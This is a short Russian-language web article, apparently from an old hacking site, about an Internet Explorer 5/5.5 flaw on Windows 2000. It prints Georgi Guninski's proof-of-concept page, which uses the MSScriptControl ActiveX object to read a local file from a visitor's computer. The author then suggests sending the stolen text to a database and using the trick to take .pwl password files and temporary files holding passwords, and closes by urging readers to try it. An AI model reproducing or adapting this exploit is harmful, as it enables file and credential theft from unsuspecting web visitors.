Снова возвращаемся к
любимой всеми теме – тасканию файлов через
web. Дырка присуща различным IE на Win2K, по
крайней мере опробовано лично на пятой
версии, говорят, так же работает и на 5.5. С
помощью бага можно стащить любой файл с
компьютера пользователя. Вот например
данный скрипт тащит с компа пользователя
файл test.txt.

<html>
<h2>
Written by Georgi Guninski.
<br>
Reads c:\test.txt
<br>
</h2>
<script>
alert("This script reads C:\\TEST.TXT\nYou may need to create it\n")
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObject("c:/test.txt","htmlfile")');
setTimeout("alert(x.body.outerHTML);",2000);
</script>
</html>

Как видите, ошибка
состоит в неправильной обработке MSScriptControl.ScriptControl, легко перенаправить
полученный текст в другой объект, например
в скрипт поста в базу данных, откуда и
получить его в готовом виде. Таким образом
можно например, зная фамилию пользователя,
стащить у него pwl-файл, утащить временные
файлы с паролями и т.д. В общем, простор для
разгула вполне есть – дерзайте.

З.Ы.: Дырка обнаружена
Георгием Гунинским, все вопросы к нему.

Оставить мнение